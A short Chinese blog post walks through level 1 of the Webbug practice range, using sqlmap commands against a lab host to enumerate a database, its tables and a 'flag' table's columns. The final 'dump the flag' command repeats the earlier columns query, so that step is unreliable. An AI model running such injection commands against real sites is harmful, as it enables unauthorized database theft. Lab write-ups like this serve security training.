Webbug靶场第一关

大家好,我是sean,今天给大家带来的是webbug的靶场第一关。

靶场环境:2003 phptudy

用到的打靶工具:sqlmap

首先打开靶场

Webbug靶场第一关  

用sqlmap来注入获取下数据库名

root@kali:~# sqlmap -u “http://192.168.161.130/pentest/test/sqli/sqltamp.php?gid=1” –current-db

Webbug靶场第一关 

查到数据库名称是pentesterlab,接下来在获取数据库的表名

root@kali:~# sqlmap -u “http://192.168.161.130/pentest/test/sqli/sqltamp.php?gid=1” -D pentesterlab –table

Webbug靶场第一关

当看到flag那就基本确定就是他了,接下来在看下这个表的字段

root@kali:~# sqlmap -u “http://192.168.161.130/pentest/test/sqli/sqltamp.php?gid=1” -D pentesterlab -T flag –columns

Webbug靶场第一关

看到两个字段的内容,然后直接爆flag

root@kali:~# sqlmap -u “http://192.168.161.130/pentest/test/sqli/sqltamp.php?gid=1” -D pentesterlab -T flag –columns

Webbug靶场第一关

第一次搞,没什么经验,自己折腾吧。

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容